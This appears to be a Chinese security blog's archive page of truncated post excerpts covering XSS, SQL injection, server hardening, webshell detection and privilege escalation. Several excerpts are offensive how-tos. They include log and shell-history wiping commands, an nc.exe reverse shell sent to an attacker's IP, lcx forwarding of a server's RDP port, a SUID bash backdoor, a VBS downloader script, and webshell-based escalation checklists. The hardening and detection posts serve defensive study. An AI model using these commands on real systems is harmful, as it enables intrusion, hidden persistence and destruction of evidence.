摘要:XSS又叫CSS (Cross-Site Scripting) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。一、XSS的种类:XSS攻击分成两类:1.一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。2.一类是来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标
阅读全文
DOM-based xss
摘要:这个漏洞往往存在于客户端脚本,如果一个Javascript脚本访问需要参数的URL,且需要将该信息用于写入自己的页面,且信息未被编码,那么就有可能存在这个漏洞。(一)DOM—based XSS漏洞的产生DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它
阅读全文
xss跨站实例总结
摘要:跨站脚本攻击(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私、钓鱼欺骗、偷取密码、传播恶意代码等攻击行为。恶意的攻击者将对客户端有危害的代码放到服务器上作为一个网页内容, 使得其他网站用户在观看此网页时,这些代码注入到了用户的浏览器中执行,使用户受到攻击。一般而言,利用跨站脚本攻击,攻击者可窃会话COOKIE从而窃取网站用户的隐私,包括密码。XSS攻击使用到的技术主要为HTML和Javascript,也包括VBScript和ActionScript等。XSS攻击对WEB服务器虽无直接危害,但是它借助网站进行传播,使网站的使用用户受到攻击,导致网站
阅读全文
IDS IPS WAF之安全剖析
摘要:现在市场上的主流网络安全产品可以分为以下几个大类:1、基础防火墙类,主要是可实现基本包过滤策略的防火墙,这类是有硬件处理、软件处理等,其主要功能实现是限制对IP:port的访问。基本上的实现都是默认情况下关闭所有的通过型访问,只开放允许访问的策略。2、IDS类,此类产品基本上以旁路为主,特点是不阻断任何网络访问,主要以提供报告和事后监督为主,少量的类似产品还提供TCP阻断等功能,但少有使用。3、IPS类,解决了IDS无法阻断的问题,基本上以在线模式为主,系统提供多个端口,以透明模式工作。在一些传统防火墙的新产品中也提供了类似功能,其特点是可以分析到数据包的内容,解决传统防火墙只能工作在4层以下
阅读全文
xss之全面剖析
摘要:XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。阅读目录XSS 是如何发生的HTML EncodeXSS 攻击场景XSS漏洞的修复如何测试XSS漏洞HTML Encode 和URL Encode的区别浏览器中的XSS过滤器ASP.NET中的XSS安全机制XSS 是如何
阅读全文
linux安全加固(2)
摘要:目录:1.BIOS2.SSH安全3.禁用telnet4.禁用代码编译5.ProFTP6.TCPwrappers7.创建一个SU组8.root通知9.history安全10.欢迎信息11.禁用所有特殊账户12.chmod危险文件13.指定允许root登陆的TTY设备14.选择一个安全的密码15.检查Rootkit16.安装补丁17.隐藏Apache信息18.隐藏php信息19.关闭不使用的服务20.检测监听中的端口21.关闭打开的端口和服务22.删除不用的rpm包23.禁用危险的php函数24.安装配置防火墙25.安装和配置BFD26.内核加固(sysctl.conf)27.更改SSH端口28.
阅读全文
Database Password Hashes
摘要:SQL Server 2000:-SELECT password from master.dbo.sysxlogins where name=’sa’0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A0×0100- constant header34767D5C- salt0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash2FD54D6119FFF04129A1D72E
阅读全文
python之BIF函数在列表中的应用
摘要:1 Python 3.3.4 (v3.3.4:7ff62415e426, Feb 10 2014, 18:13:51) [MSC v.1600 64 bit (AMD64)] on win32 2 Type "copyright", "credits" or "license()" for more information. 3 >>> cast=["cleese","palin","jones","idle"] 4 >>&g
阅读全文
linux安全加固(1)
摘要:Redhat是目前企业中用的最多的一类Linux,而目前针对Redhat攻击的黑客也越来越多了。我们要如何为这类服务器做好安全加固工作呢?一. 账户安全 1.1 锁定系统中多余的自建帐号 检查方法: 执行命令 #cat /etc/passwd #cat /etc/shadow 查看账户、口令文件,与系统管理员确认不必要的账号。对于一些保留的系统伪帐户如:bin, sys,adm,uucp,lp, nuucp,hpdb, www, daemon等可根据需要锁定登陆。 备份方法: #cp -p /etc/passwd /etc/passwd_bak #cp -p /etc/sha...
阅读全文
windows2003安全加固
摘要:因为IIS的方便性和易用性,使它成为最受欢迎的Web服务器软件之一。但是,IIS的安全性却一直令人担忧。如何利用IIS建立一个安全的Web服务器,是很多人关心的话题。要创建一个安全可靠的Web服务器,必须要实现Windows 2003和IIS的双重安全,因为IIS的用户同时也是Windows 2003的用户,并且IIS目录的权限依赖Windows的NTFS文件系统的权限控制,所以保护IIS安全的第一步就是确保Windows 2003操作系统的安全,所以要对服务器进行安全加固,以免遭到黑客的攻击,造成严重的后果。 我们通过以下几个方面对您的系统进行安全加固: 1. 系统的安全加固:我们通...
阅读全文
windows2003安全加固脚本
摘要:@echo offtitle= Windwos/index.html' target='_blank'>Windows Securityecho.echo *******************************************************************************echo. Common Security Configuration For Windows Server 2003echo ****************************************************************
阅读全文
windows2008R2安全加固
摘要:一.更改终端默认端口号步骤:1.运行regedit 2.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds \rdpwd\Tds \tcp],看见PortNamber值了吗?其默认值是3389,修改成所希望的端口即可,例如12345 3.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\Tenninal Server\WinStations\ RDP\Tcp],将PortNumber的值(默认是3389)修改成端口12345(自定义)。4.防火墙
阅读全文
WAF与IPS的区别总结
摘要:谁是最佳选择?Web应用防护无疑是一个热门话题。由于技术的发展成熟和人们对便利性的期望越来越高,Web应用成为主流的业务系统载体。在Web上“安家”的关键业务系统中蕴藏的数据价值引起攻击者的青睐,网上流传的Web漏洞挖掘和攻击工具让攻击的门槛降低,也使得很多攻击带有盲目和随机性。比如利用GoogleHacking原理的批量查找具有已知漏洞的应用程序,还有SQL批量注入和挂马等。但对于重要的Web应用(比如运营商或金融),始终有受利益驱动的黑客进行持续的跟踪。如果说传统的“大而全”安全防护产品能抵御大多数由工具产生的攻击行为,那么对于有针对性的攻击行为则力不从心。而WAF正是应需求而生的一款高端
阅读全文
web后门排查与高效分析web日志技巧
摘要:今年一直大大小小的事情忙,很少有时间能静下心写个文章,所以最近博客更新也越来越少了,公司现在安全团队在我这边,一直在玩命的招人。下个月8号有一个互联网金融的会,4月在qcon北京站,都以嘉宾的身份去分享东西,这段时间也需要准备。 前前后后简历收到几十份,我希望找到[编程+运维+安全]的全能型人才,一般来的简历都是要么就只会搞渗透,要么就会点渗透会点编程,但是没有基础运维能力,大多没有应急的经验。 这会也挺晚,抽点时间稍微写下[应急响应中web后门排查与高效分析web日志技巧],关于系统后门和一些其他的日志系统日志什么就留到以后再说吧,所以就不要喷我连系统后门都不查还说应急响应。 举例...
阅读全文
linux下python版webshell后门查杀工具
摘要:使用说明:1.查杀指定路径:pythonwebshell.py 路径2.按时间查找文件:python webshell.py 路径 “2013-09-28 00:00:00″# -*- coding: utf-8 -*-import osimport sysimport reimport timerulelist = [ '(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))', '(base64_decode\([\'"][\w\+
阅读全文
如何做一名好的web安全工程师?
摘要:在网络安全行业里面,web安全方向的人相对来说算是占大头,因为web安全初学阶段不像系统底层安全那么枯燥,而且成功hack目标网站的成就感相对也是比较强的。 web安全工程师这个职位在甲方和乙方公司都有,在安全这块,甲方指提出安全需求的公司,而乙方公司则是指提供安全服务的公司,一般的中小型公司没有安全岗位,甲方的安全部大多都挂在运维部下面。另外在大公司和小公司web安全工程师做的事情也不一样,大公司工作分的相对细,一般做渗透测试的就只做渗透测试,在[正规小公司]就不一样了,一般本职工作就比较多,可能安全服务、安全研究以及安全开发都会放一部分在身上,这对工程师的要求比较高,也非常难招到。这...
阅读全文
从“黑掉Github”学Web安全开发
摘要:首先,这个故事要从Github OAuth讲起。所以,我们需要先知道什么是OAuth。所谓OAuth就是说,第三方的应用可以通过你的授权而不用知道你的帐号密码能够访问你在某网站的你自己的数据或功能。像Google,Facebook,Twitter等网站都提供了OAuth服务,提供OAuth服务的网站一般都有很多开放的API,第三方应用会调用这些API来开发他们的应用以让用户拥有更多的功能,但是,当用户在使用这些第三方应用的时候,这些第三方的应用会来访问用户的帐户内的功能和数据,所以,当第三应用要干这些事的时候,我们不能让第三方应用弹出一个对话框来问用户要他的帐号密码,不然第三方的应用就把用户的
阅读全文
DNS劫持
摘要:DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能反应或访问的是假网址。 DNS(域名劫持)是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被劫持的网络范围内进行,所以在此范围外的域名服务器(DNS)能够返回正常的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常DNS...
阅读全文
Linux之入侵痕迹清理总结
摘要:rm -f -r /var/log/*rm .bash_historyrm recently_used
阅读全文
MySQL使用痕迹清理~/.mysql_history
摘要:mysql会给出我们最近执行的SQL命令和脚本;同linux command保存在~/.bash_history一样,你用mysql连接MySQL server的所有操作也会被记录到~/.mysql_history文件中,这样就会有很大的安全风险了,如添加MySQL用户的sql也同样会被明文记录到此文件中。1,查看你系统的~/.mysql_history隐藏文件(我的测试环境下,一般linux的mysql用户来管理,所以在/home/mysql目录下会有这个文件)-bash-3.2$ ls -al | grep mysql_-rw------- 1 mysql mysql 5006 Apr 1
阅读全文
WINDOWS之入侵痕迹清理总结
摘要:Windows的日志文件通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT;安全日志文件:%systemroot%\system32\config\SecEvent.EVT;系统日志文件:%systemroot%\system32\config\SysEvent.EVT;DNS日志默认位置:%sys temroot%\system32\config,默认文件大小512KBInternet信息服务FTP日志默认位置:%systemroot%\system32\l
阅读全文
SQL注入攻击技巧总结
摘要:0×01 你要知道目前有哪些数据库微软公司旗下的:Microsoft SQL server 简称 MS-SQL 或者 SQL SERVER (大型数据库操作,功能和性能异常强大)(一般也是ASP或者ASP.NET)access,微软Office系列产品之一,极小型数据库。功能和性能当然也是相当一般。性能甚至可以说是相当低(常与ASP应用交互)Oracle公司旗下的:MySQL 是一个关系型数据库管理系统(常与PHP web应用交互)Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统Apache旗下的:MySql0&#
阅读全文
PHP iconv函数字符串转码导致截断问题
摘要:1、iconv函数原型string iconv ( string $in_charset , string $out_charset , string $str )in_charset:输入的字符集out_charset:输出的字符集str:要转换的字符串具体查看php手册:http://www.php.net/manual/zh/function.iconv.php2、iconv导致字符串截断iconv在字符编码转换时可能导致字符串截断。当$str中有一个字符不能被目标字符集所表示时,str 从第一个无效字符开始截断并导致一个 E_NOTICE。例如:$d = iconv(“UTF-8″,
阅读全文
PHP中is_numeric函数十六进制绕过0day
摘要:0×00 简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。0×01 函数是否安全接下来我们来看个例子,说明这个函数是否安全。$s = is_numeric($_GET['s'])?$_GET['s']:0;$sql="insert into test(type)values($s);";//是 values($s) 不是values('$s
阅读全文
反射型xss绕过IE xss filter
摘要:反射xss利用方法,绕过IE XSS Filter假设 1.php页面代码如下:echo $_GET['str'];使用IE浏览器访问该页面1.php?str=由于xss filter渲染 导致XSS不成功接下来我们要这么绕过呢?如果该站点 可以发帖、友情链接等等 只要能发链接地址其实不只发链接 嘿嘿。由于IE XSS FILTER 只是检测 referer 是否来自本源,如果来自本源 则 Ie XSS FILTER则不生效。你现在明白了吧在javascript: date: 等协议无效的情况下:">求友情链接IE用户点击即可中招(其他部分浏览器也中招)
阅读全文
Dedecms最新版本存储型XSS
摘要:由于编辑文章的模板参数 typeid2可控,导致存储XSS发生。dedecms/dede/templets/article_edit.htm页面316-325行代码如下: 文章副栏目: ' style='width:200px;' /> , 'typeid2', '')" alt='选择副栏目' title='选择副栏目' /> 从上面可以看出,变量$channelid 与 $arcRow['typeid2'] 只要可控...
阅读全文
网站程序+服务器提权思路总结
摘要:(一)针对网站程序,不考虑服务器。一、查找注入,注意数据库用户权限和站库是否同服。二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、Apache等。四、查找编辑器,比较典型的ewebeditor、fckeditor等等。五、查找phpmyadmin等管理程序,可以尝试弱口令,或者寻找其漏洞。六、百度、谷歌搜索程序公开漏洞。七、猜解文件,如知道某文件为admin_login.php,我们可尝试admin_add.php、admin_
阅读全文
NC反弹CMDSHELL提权总结
摘要:Server-U等都不可以用的情况下. 一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去2:然后本地执行nc -vv -lp 52进行反弹3:在shell命令下执行F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.5:直接
阅读全文
udf提权方法和出现问题汇总
摘要:一、适用条件 1.目标系统是Windows(Win2000,XP,Win2003); 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 3.有mysql账号密码 二、导出udf MYSQL 5.1以下版本导出路径
阅读全文
cmd+lcx+nc+sc提权工具总结
摘要:cmd:执行命令的载体cmdshelllcx:端口映射工具1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器nc:监听工具A:基本用法1.连接到REMOTE主机格式:nc.exe -nvv 192.168.2.2 80讲解:连到192.168.2.2的TCP80端口2.
阅读全文
内网提权总结
摘要:1.端口映射解决内网提权步骤:1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器在webshell上执行lcx,实现端口转发:for example:lcx.exe -slave 127.0.0.1 51 192.168.2.2 3389使用工具:cmd.exe lc.
阅读全文
WINDOWS渗透与提权总结(2)
摘要:vbs下载者:011:0203echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs0405echo sGet.Mode = 3 >>c:\windows\cftmon.vbs0607echo sGet.Type = 1 >>c:\windows\cftmon.vbs0809echo sGet.Open() >>c:\windows\cftmon.vbs1011echo sGet.Write(xPost.responseBody) >>
阅读全文
WINDOWS渗透与提权总结(1)
摘要:旁站路径问题:1、读网站配置。2、用以下VBS:01On Error Resume Next0203If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then0405MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"0607WScr
阅读全文
常用webshell提权方法总结
摘要:pcAnywhere提权:1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用户的目录权限,只剩下administer和system用户目录权限,则无法提权;2.在webshll的大马中查找到pcanywhere目录里的host目录,里面的cif文件保存了连接pcanywhere的账户和密码,然后下载下来,通过PcAnywhere密码破解工具进行破解密码,然后再自己的电脑上安装pcanywhere,然后通过连接到另一台电脑进行远程桌面连接;——————————–利用HASH
阅读全文
LINUX的两种后门总结(suid shell与inetd)
摘要:前提:你现在已经是root用户, 想留一个后门以便日后再一次进入。系统环境:1dawg:~# uname -a2Linux dawg 2.4.20-1-386#3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux1. SUID shell关于SUID位的知识,请点这里首先, 先切换成为root用户,并执行以下的命令:1dawg:~# cp /bin/bash /.woot2dawg:~# chmod 4755 /.woot3dawg:~# ls -al /.woot4-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.
阅读全文
LINUX渗透与提权总结
摘要:本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。Linux 系统下的一些常见路径:001/etc/passwd002003/etc/shadow004005/etc/fstab006007/etc/host.conf008009/etc/motd010011/etc/ld.so.conf012013/var/www/htdocs/index.php014015/var/www/conf/httpd.conf016017/var/www/htdocs/index.html018019/var/httpd/conf/php
阅读全文
webshell提权20种思路
摘要:1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限)2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接)3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解)4,SAM提权(SAM系统帐户,通常需要下载临时存放的SAM文件,然后进行HASH破解)5,NC提权(利用NC命令,反弹一个端口,然后TELNET远程去连接一个端口,虽然权限不够大,但结合巴西烤肉,也是能够成功的)6,PR提权(PR提权,这个就不多说了,最好是免杀的PR大杀器,这样更方面我们去操作)7,IIS提权
阅读全文
FCK编辑器漏洞总结
摘要:1.查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2. Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破!测试通过。—————————————————————————————————————————————————————————————3.Version Upload a new file:—————————————————————————————————————————————————————————————4.FCK
阅读全文
ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
摘要:这个编辑器按脚本分主要有4个版本,ASP/ASPX/PHP/JSP 每个版本都有可以利用的漏洞。判断网站是否使用了eWebEditor查看程序源代码,看看源码中是否存在类似”ewebeditor.asp?id=”语句,只要有此语句的存在,就能判断网站确实使用了WEB编辑器。另外一种方法就是站上新闻或...
阅读全文
PHP文件包含漏洞剖析
摘要:一、什么才是”远程文件包含漏洞”?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。涉及到的危险函数:include(),require()和include_once(),require_once()Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。Require:跟include唯一不同的是,当产生错误时候,include下面继续运行而require停止运行了。Include_once:这个函数跟include函数作用几乎相同,只
阅读全文
文件上传漏洞总结
摘要:1.在很早以前,很多上传文件过滤是用的是javascript,所以改一下javascript或直接nc发包就行了。有的是判断后缀,有的只是判断id,比如: “uploadfile” style=”file” size=”uploadfile” runat=“lbtnUpload” runat=“Ja
阅读全文
服务器软件解析漏洞总结
摘要:一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 2.文件解析 wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建
阅读全文
JAVA环境变量配置
摘要:下面开始配置JAVA环境变量:1.右击【我的电脑】---【属性】-----【高级】---【环境变量】2.选择【新建系统变量】--弹出“新建系统变量”对话框,在“变量名”文本框输入“JAVA_HOME”,在“变量值”文本框输入JDK的安装路径,单击“确定”按钮3.在“系统变量”选项区域中查看PATH变量,如果不存在,则新建变量 PATH,否则选中该变量,单击“编辑”按钮,在“变量值”文本框的起始位置添加“%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;”或者是直接“%JAVA_HOME%\bin;”,单击确定按钮4.在“系统变量”选项区域中查看CLASSPATH 变量,如
阅读全文
Python2.x与Python3.x的区别
摘要:这个星期开始学习Python了,因为看的书都是基于Python2.x,而且我安装的是Python3.1,所以书上写的地方好多都不适用于Python3.1,特意在Google上search了一下3.x和2.x的区别。特此在自己的空间中记录一下,以备以后查找方便,也可以分享给想学习Python的friends.1.性能 Py3.0运行 pystone benchmark的速度比Py2.5慢30%。Guido认为Py3.0有极大的优化空间,在字符串和整形操作上可 以取得很好的优化结果。 Py3.1性能比Py2.5慢15%,还有很大的提升空间。 2.编码 Py3.X源码文件默认使用utf-8编码,..
阅读全文
十进制到十六进制转换程序
摘要:源代码:dectohex segmentassume cs:dectohexmain proc farrepeat:call dectobincall crlfcall bintohexcall crlfjmp repeatmain endpdectobin proc nearmov bx,0newchar:mov ah,1int 21hsub al,30hjl exitcmp al,9djg exitcbwxchg ax,bxmov cx,10dmul cxxchg ax,bxadd bx,axjmp newcharexit:retdectobin endpbintohex proc nea
阅读全文
二进制到十六进制转换程序
摘要:源代码:program segmentmain proc farassume cs:programstart:push dssub ax,axpush axmov ch,4roate:mov cl,4rol bx,clmov al,bland al,0fhadd al,30hcmp al,3ahjl printitadd al,7hprintit:mov dl,almov ah,2int 21hdec chjnz roateretmain endpprogram endsend
阅读全文
PHP FORUM
摘要:1.index.php论坛首页论坛首页,欢迎登录 | 主页 | 个人资料 | 退出论坛主页 | 注册 | 登录2.main_forum.php论坛主页个人资料注销用户帖子访问量回复数日期 "> 1) {$prevpage = $page - 1; } //当前记录 $curr...
阅读全文
旁注原理
摘要:旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。介绍旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。以本人对于旁注入侵的理解来说,旁注入侵绝对需要权限的提升作为帮助,如果主机的设置是IIS单用户权限/禁止运行任意CMD命令的话,这样子旁注的入侵就成为了一大难题,没有了CMD的
阅读全文
SQL注入原理
摘要:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.基础知识原理SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由
阅读全文
xss绕过过滤之方法
摘要:很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对转换成<以及>,经过转换以后虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦被转换掉,什么就会转换成“<script src=1.js></script>”,不能执行,因此,很多人认为只要用户的输入没有构成,就不能闭合前后的标签,其语句当然也不会有害。但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS。1.转义字符首先要认识一下“\”,这个不是斜杠么。对的,斜杠在JAVASCRIPT
阅读全文
PHP CALC
摘要:PHP计算器 计算器 " > "> '; if($num1 && $num1 && $numa && $numb){ echo "结果:".$_GET["num1"]." ".$_GET["ysf"]." ".$_GET["num2"]." = ".$sum; }else{ echo $message; } echo ''; } ?>
阅读全文
IP欺骗原理与过程分析
摘要:IP欺骗攻击法原创:r00t QQ: 22664566http://www.unsecret.org---------------------------------------------作者:r00t发布日期:2002-3-15上传日期:2002-3-15来源:http://www.unsecret.org这是我到《公开化安全》的第一篇文章,很多不足的地方,希望大家来信指点^_*什么是IP欺骗?IP欺骗是不是用某种软件把自己的IP隐藏起来?回答当然是NO!!!。这里我要说的IP欺骗是一种攻击方法,即使主机系统本身没有任何漏洞,但仍然可以使用各种手段来达到攻击目的,这种欺骗纯属技术性的,一般
阅读全文
DNS域传送漏洞利用
摘要:DNS区域传送(DNS zone transfer)指的是一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库。这为运行中的DNS服务提供了一定的冗余度,其目的是为了防止主的域名服务器因意外故障变得不可用时影响到整个域名的解析。一般来说,DNS区域传送操作只在网络里真的有备用域名DNS服务器时才有必要用到,但许多DNS服务器却被错误地配置成只要有client发出请求,就会向对方提供一个zone数据库的详细信息,所以说允许不受信任的因特网用户执行DNS区域传送(zone transfer)操作是后果最为严重的错误配置之一。区域传送漏洞的危害:黑客可以快速的判定出某个特定zone的所
阅读全文
SHIFT后门拿服务器之方法总结
摘要:提权工具如下:cmd.exe Churrasco.exe nc.exe提权前提:Wscript组件成功开启如果Wscript组件被关闭,则使用以下方法开启:源代码: 将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/-->Current User: NETWO
阅读全文